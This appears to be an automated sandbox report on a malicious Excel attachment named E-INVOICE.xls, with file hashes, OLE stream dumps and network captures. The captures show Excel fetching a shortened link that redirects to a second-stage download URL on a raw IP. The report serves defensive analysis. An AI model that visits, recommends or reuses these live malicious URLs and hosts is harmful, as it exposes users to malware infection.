UNIFIEDLAYER-AS-1USM.V TBN - VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
  • 50.87.144.157
PO#RSB-8927393_2324.exeGet hashmaliciousFormBookBrowse
  • 162.241.216.26
SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
  • 162.241.62.63
80TeZdsbeA6B6j4.exeGet hashmaliciousFormBookBrowse
  • 50.87.148.119
https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflkGet hashmaliciousHTMLPhisherBrowse
  • 108.167.151.63
PMcyGpR57k.elfGet hashmaliciousUnknownBrowse
  • 74.91.234.112
ztGOiA742S.elfGet hashmaliciousUnknownBrowse
  • 142.5.50.93
Purchase order No. 1073 xls.wsfGet hashmaliciousUnknownBrowse
  • 192.185.76.254
RFQ - MK FMHS.RFQ.24.101.exeGet hashmaliciousFormBookBrowse
  • 162.241.253.174
http://customer-easyparkas.com/Get hashmaliciousUnknownBrowse
  • 192.185.50.220
No context
No context
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1461800
Entropy (8bit):2.466094732676486
Encrypted:false
SSDEEP:1536:kdMcdn0k87F3e8l55LWBJxz/CMge7xbphHbd3kcXu50y7eMGn5v1EN6zF8Xqbb0Z:kouXfzu50yknKvqc+R3Xu50yknG/qc+I
MD5:3221719DA1CA6DAE0ED75449AD3BBDBC
SHA1:C1C0DAAE75FF32B92A1D060BC1FCE01D48B8BE0F
SHA-256:5C335B6C60214A0B5A1C399F8DF14FC148ADBC0EA9D0E78098AAB59985778775
SHA-512:1C00C9D480956BF787A6AF345ACAB11F51F656142280D07EBDA06816B83ABC1AB1F5BB72E0D53D0122B3B5E7BBD1F5330FCB6272EBA2F1591CF938F92A629381
Malicious:false
Reputation:low
Preview:....l...........................?{...-.. EMF....(N..j.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.....................................................................................E../..E......../..........E..........m.B..........E.........N../.....y./.....m./..............E.........T............../......E.,........./
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1461800
Entropy (8bit):2.466094732676486
Encrypted:false
SSDEEP:1536:kdMcdn0k87F3e8l55LWBJxz/CMge7xbphHbd3kcXu50y7eMGn5v1EN6zF8Xqbb0Z:kouXfzu50yknKvqc+R3Xu50yknG/qc+I
MD5:3221719DA1CA6DAE0ED75449AD3BBDBC
SHA1:C1C0DAAE75FF32B92A1D060BC1FCE01D48B8BE0F
SHA-256:5C335B6C60214A0B5A1C399F8DF14FC148ADBC0EA9D0E78098AAB59985778775
SHA-512:1C00C9D480956BF787A6AF345ACAB11F51F656142280D07EBDA06816B83ABC1AB1F5BB72E0D53D0122B3B5E7BBD1F5330FCB6272EBA2F1591CF938F92A629381
Malicious:false
Reputation:low
Preview:....l...........................?{...-.. EMF....(N..j.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.....................................................................................E../..E......../..........E..........m.B..........E.........N../.....y./.....m./..............E.........T............../......E.,........./
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Reputation:high, very likely benign file
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Reputation:high, very likely benign file
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Reputation:high, very likely benign file
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 5 06:13:33 2024, Security: 1
Category:dropped
Size (bytes):186368
Entropy (8bit):7.920919180955028
Encrypted:false
SSDEEP:3072:iyKb7cdPKQXh1iD1mcHfZe5HPO0DF4qHrrFWArfd6LaHDQuux5/:ebogihQD1mUZODjHdtrfksD4/
MD5:D386DF37CEFED8CA697E9AD4592407E5
SHA1:0EE9000E3FB7663AD600A944A294F45AF9FB0F79
SHA-256:3EC343EB557E6CB18C079D8439B063A215C147C0172284F2D4E8AE001F9211D9
SHA-512:22797BEC9FB536029162E5736DC8F1B4ADFBB3AD9712C1A5F25A470E8D026622D656F5D7BDC10BCC00362BC943BCAE314BF83B062DA0CDB78BA127D6C585B513
Malicious:false
Reputation:low
Preview:......................>...................................*...................m.......................................................................................................................................................................................................................................................................................................................................................................................................................................................i................................................................................................................... ...!..."...#...$...%...&...'...(...)...........,...j......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...n.......o...p...q...r...s...t...u...v...w...x...y...z...
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 5 06:13:33 2024, Security: 1
Category:dropped
Size (bytes):186368
Entropy (8bit):7.920919180955028
Encrypted:false
SSDEEP:3072:iyKb7cdPKQXh1iD1mcHfZe5HPO0DF4qHrrFWArfd6LaHDQuux5/:ebogihQD1mUZODjHdtrfksD4/
MD5:D386DF37CEFED8CA697E9AD4592407E5
SHA1:0EE9000E3FB7663AD600A944A294F45AF9FB0F79
SHA-256:3EC343EB557E6CB18C079D8439B063A215C147C0172284F2D4E8AE001F9211D9
SHA-512:22797BEC9FB536029162E5736DC8F1B4ADFBB3AD9712C1A5F25A470E8D026622D656F5D7BDC10BCC00362BC943BCAE314BF83B062DA0CDB78BA127D6C585B513
Malicious:true
Reputation:low
Preview:......................>...................................*...................m.......................................................................................................................................................................................................................................................................................................................................................................................................................................................i................................................................................................................... ...!..."...#...$...%...&...'...(...)...........,...j......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...n.......o...p...q...r...s...t...u...v...w...x...y...z...
File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jul 4 01:02:18 2024, Security: 1
Entropy (8bit):7.9252141270894505
TrID:
  • Microsoft Excel sheet (30009/1) 78.94%
  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:E-INVOICE.xls
File size:190'976 bytes
MD5:6586786ff2d63581546545fe37f711db
SHA1:227eef347b15fe072cbf41c49a42d4d9f6bb4888
SHA256:3722989fb37d2b30e4e04404660ee6757fe8dc872540ddf57e5c04b8f6307315
SHA512:70f77b35d4b1b4fabcbec07e9fdfc360b087d422495eec9b4f67ad730e9da72285852574aba5ba7481f65daa1e0c6ab1bf726407e51024d7e9a21610c54910d3
SSDEEP:3072:oyKbDHNW/JbefJO/2qKqLII7ZgtNQx3mKwd5OM303qmT6HFn:UbDtW/VYJFytKn5mME31OHFn
TLSH:E514123C32A5D812C7DA99B404C374038E6DBC68E96F2CCABC7037675EB679022D7566
File Content Preview:........................>...................................*...................m..............................................................................................................................................................................
Icon Hash:276ea3a6a6b7bfbf
Document Type:OLE
Number of OLE Files:1
Has Summary Info:
Application Name:Microsoft Excel
Encrypted Document:True
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:False
Code Page:1252
Author:
Last Saved By:
Create Time:2006-09-16 00:00:00
Last Saved Time:2024-07-04 00:02:18
Creating Application:Microsoft Excel
Security:1
Document Code Page:1252
Thumbnail Scaling Desired:False
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:786432
General
Stream Path:\x1CompObj
CLSID:
File Type:data
Stream Size:114
Entropy:4.25248375192737
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:\x5DocumentSummaryInformation
CLSID:
File Type:data
Stream Size:244
Entropy:2.889430592781307
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
General
Stream Path:\x5SummaryInformation
CLSID:
File Type:data
Stream Size:200
Entropy:3.246575879994164
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 6 o . . . . . . . . .
Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
General
Stream Path:MBD00022107/\x1CompObj
CLSID:
File Type:data
Stream Size:99
Entropy:3.631242196770981
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:MBD00022107/Package
CLSID:
File Type:Microsoft Excel 2007+
Stream Size:19814
Entropy:7.589625426503851
Base64 Encoded:True
Data ASCII:P K . . . . . . . . . . ! . . . . = . . . F . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 ab 0b 0d 1f 3d 01 00 00 46 03 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:MBD00022108/\x1Ole
CLSID:
File Type:data
Stream Size:600
Entropy:6.0537554513486045
Base64 Encoded:False
Data ASCII:. . . . . & a 0 # J . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . : . / . / . h . o . p . . . f . y . i . / . r . 1 . F . b . C . . . ; l I ( & + p R . _ & . . R w . . 8 % . f G @ I [ . . O b a K ( . . . _ 1 \\ . . + . t . = . \\ . . & * ? . 1 6 . # < . < . { i N D D Z . . + ' 1 k s . . \\ . - B ) U T 4 a A . { 0 . . H q / \\ b X . . . / . I a . . . . S . i u N " . . % . i A y 0 B % . . : c D . j S . X o z v . . v r . 7 . . . . . . . . . . . . . . . . . . . . x . Z . 0 . 4 . X . 4 . i .
Data Raw:01 00 00 02 1f db 26 61 97 30 23 4a 00 00 00 00 00 00 00 00 00 00 00 00 1e 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 1a 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 6f 00 70 00 2e 00 66 00 79 00 69 00 2f 00 72 00 31 00 46 00 62 00 43 00 00 00 3b 6c 49 28 26 e6 2b 70 52 16 5f 26 f0 15 bc 9f c9 83 cc 52 77 c2 09 1d a9 38 25 7f 66 8f 47 dd 40 f5 49 bd a6 5b
General
Stream Path:Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:165308
Entropy:7.996482210140843
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . p g d . u { ' . . 4 F . . . s . } P , : Y { . P t = . . . . . . . . . R w . . . \\ . p . . U 4 D h D I . . 6 l z - . _ 9 ' _ . w J . m R H ) 8 K ` , . Y , M . . . J . K . d u . . t . M F + . . r . X B . . . | a . . . O . . . = . . . 1 K p + . . . . . Q s \\ . . . [ . Q . . . } . . . . = 0 . . . . % J . . . . . : . . . * . . . . t = . . . ` < . . . 2 ; y @ . . . . . . [ 2 " . . . * . . . . m . . . . . . . c 1 . . . U H % o ~ 8 k / l A . . V 5 x { 1 . . .
Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 8a 70 67 64 e5 da 83 75 7b c7 c5 27 05 82 08 b9 34 97 46 0f 87 a5 c5 86 a2 00 73 11 7d aa 50 2c 97 3a 59 f4 7b cb bf 50 74 3d 14 eb ee d5 9a dd e1 00 02 00 b0 04 c1 00 02 00 52 77 e2 00 00 00 5c 00 70 00 fe e1 8e d3 8a 55 34 44 c3 68 44 a1 49 00 fe 8f 9c 06 36 cf 6c 7a fa 2d 10 5f ff b7 39 27
TimestampSource PortDest PortSource IPDest IP
Jul 5, 2024 07:13:17.241704941 CEST4916180192.168.2.22192.185.89.92
Jul 5, 2024 07:13:17.246481895 CEST8049161192.185.89.92192.168.2.22
Jul 5, 2024 07:13:17.246561050 CEST4916180192.168.2.22192.185.89.92
Jul 5, 2024 07:13:17.246630907 CEST4916180192.168.2.22192.185.89.92
Jul 5, 2024 07:13:17.251421928 CEST8049161192.185.89.92192.168.2.22
Jul 5, 2024 07:13:17.902575016 CEST8049161192.185.89.92192.168.2.22
Jul 5, 2024 07:13:17.902669907 CEST4916180192.168.2.22192.185.89.92
Jul 5, 2024 07:13:17.907018900 CEST4916280192.168.2.22198.46.178.137
Jul 5, 2024 07:13:17.911782026 CEST8049162198.46.178.137192.168.2.22
Jul 5, 2024 07:13:17.911895037 CEST4916280192.168.2.22198.46.178.137
Jul 5, 2024 07:13:17.911895037 CEST4916280192.168.2.22198.46.178.137
Jul 5, 2024 07:13:17.916672945 CEST8049162198.46.178.137192.168.2.22
Jul 5, 2024 07:13:18.459594965 CEST8049162198.46.178.137192.168.2.22
Jul 5, 2024 07:13:18.459688902 CEST4916280192.168.2.22198.46.178.137
Jul 5, 2024 07:13:22.919419050 CEST8049161192.185.89.92192.168.2.22
Jul 5, 2024 07:13:22.919497967 CEST4916180192.168.2.22192.185.89.92
Jul 5, 2024 07:13:23.397226095 CEST8049162198.46.178.137192.168.2.22
Jul 5, 2024 07:13:23.397298098 CEST4916280192.168.2.22198.46.178.137
Jul 5, 2024 07:13:34.771410942 CEST4916180192.168.2.22192.185.89.92
Jul 5, 2024 07:13:34.771601915 CEST4916380192.168.2.22192.185.89.92
Jul 5, 2024 07:13:34.776293039 CEST8049161192.185.89.92192.168.2.22
Jul 5, 2024 07:13:34.776416063 CEST8049163192.185.89.92192.168.2.22
Jul 5, 2024 07:13:34.776475906 CEST4916380192.168.2.22192.185.89.92
Jul 5, 2024 07:13:34.776527882 CEST4916380192.168.2.22192.185.89.92
Jul 5, 2024 07:13:34.781348944 CEST8049163192.185.89.92192.168.2.22
Jul 5, 2024 07:13:35.401870012 CEST8049163192.185.89.92192.168.2.22
Jul 5, 2024 07:13:35.402039051 CEST4916380192.168.2.22192.185.89.92
Jul 5, 2024 07:13:35.402621031 CEST4916280192.168.2.22198.46.178.137
Jul 5, 2024 07:13:35.403060913 CEST4916480192.168.2.22198.46.178.137
Jul 5, 2024 07:13:35.407396078 CEST8049162198.46.178.137192.168.2.22
Jul 5, 2024 07:13:35.407855988 CEST8049164198.46.178.137192.168.2.22
Jul 5, 2024 07:13:35.407907963 CEST4916480192.168.2.22198.46.178.137
Jul 5, 2024 07:13:35.411452055 CEST4916480192.168.2.22198.46.178.137
Jul 5, 2024 07:13:35.416256905 CEST8049164198.46.178.137192.168.2.22
Jul 5, 2024 07:13:35.891732931 CEST8049164198.46.178.137192.168.2.22
Jul 5, 2024 07:13:35.891887903 CEST4916480192.168.2.22198.46.178.137
Jul 5, 2024 07:13:40.403429031 CEST8049163192.185.89.92192.168.2.22
Jul 5, 2024 07:13:40.403506041 CEST4916380192.168.2.22192.185.89.92
Jul 5, 2024 07:13:40.882498980 CEST8049164198.46.178.137192.168.2.22
Jul 5, 2024 07:13:40.882596970 CEST4916480192.168.2.22198.46.178.137
TimestampSource PortDest PortSource IPDest IP
Jul 5, 2024 07:13:17.114327908 CEST5456253192.168.2.228.8.8.8
Jul 5, 2024 07:13:17.236748934 CEST53545628.8.8.8192.168.2.22
TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Jul 5, 2024 07:13:17.114327908 CEST192.168.2.228.8.8.80x88cdStandard query (0)hop.fyiA (IP address)IN (0x0001)false
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Jul 5, 2024 07:13:17.236748934 CEST8.8.8.8192.168.2.220x88cdNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
  • hop.fyi
  • 198.46.178.137
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.2249161192.185.89.92801548C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampBytes transferredDirectionData
Jul 5, 2024 07:13:17.246630907 CEST319OUTGET /r1FbC HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: hop.fyi
Connection: Keep-Alive
Jul 5, 2024 07:13:17.902575016 CEST646INHTTP/1.1 301 Moved Permanently
Date: Fri, 05 Jul 2024 05:13:17 GMT
Server: Apache
Cache-Control: no-cache, no-store, private
Expires: -1
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 215
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 91 3d 0f 82 30 10 86 77 7f 45 ed e2 64 2b d1 08 6a 61 f1 63 d5 18 1c 1c 2b 9c 94 84 2f eb 69 f4 df 5b a8 84 84 91 de 25 6d 93 bb 7b df 27 27 c6 bb e3 36 bc 9e f6 44 61 9e 05 23 61 2f 62 8e 50 20 63 fb 6c be 39 a0 24 91 92 fa 09 e8 d3 4b 78 98 7a 94 f0 7e 81 42 ac a6 f0 78 a5 6f 9f 6a b8 6b 78 2a 4a a2 b2 40 28 4c d7 6c f3 d2 99 3f a9 8b d6 9c 3b 2b 8f 2d 96 cc 71 3d e6 cc 5d fe 91 79 55 71 9d 98 64 6d b6 c1 e2 32 9a 34 72 9d 1e a6 98 41 70 86 38 d5 10 61 5a 24 04 4b 32 6c b4 e0 76 98 05 e7 1d b9 b8 95 f1 b7 63 ec 89 09 c3 6b 20 7d 3a 4c 95 06 43 dd ca 80 fd ad 5a 7f c6 72 bd b7 1f d8 20 06 3f ce 01 00 00
Data Ascii: =0wEd+jac+/i[%m{''6Da#a/bP cl9$Kxz~Bxojkx*J@(Ll?;+-q=]yUqdm24rAp8aZ$K2lvck }:LCZr ?


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.2249162198.46.178.137801548C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampBytes transferredDirectionData
Jul 5, 2024 07:13:17.911895037 CEST353OUTGET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.46.178.137
Connection: Keep-Alive
Jul 5, 2024 07:13:18.459594965 CEST541INHTTP/1.1 404 Not Found
Date: Fri, 05 Jul 2024 05:13:18 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 300
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.2249163192.185.89.92801548C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampBytes transferredDirectionData
Jul 5, 2024 07:13:34.776527882 CEST319OUTGET /r1FbC HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: hop.fyi
Connection: Keep-Alive
Jul 5, 2024 07:13:35.401870012 CEST646INHTTP/1.1 301 Moved Permanently
Date: Fri, 05 Jul 2024 05:13:35 GMT
Server: Apache
Cache-Control: no-cache, no-store, private
Expires: -1
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://198.46.178.137/xampp/rg/rg.rg.rg.rgrgrgrgrg.doc
Vary: Accept-Encoding
Content-Encoding: gzip
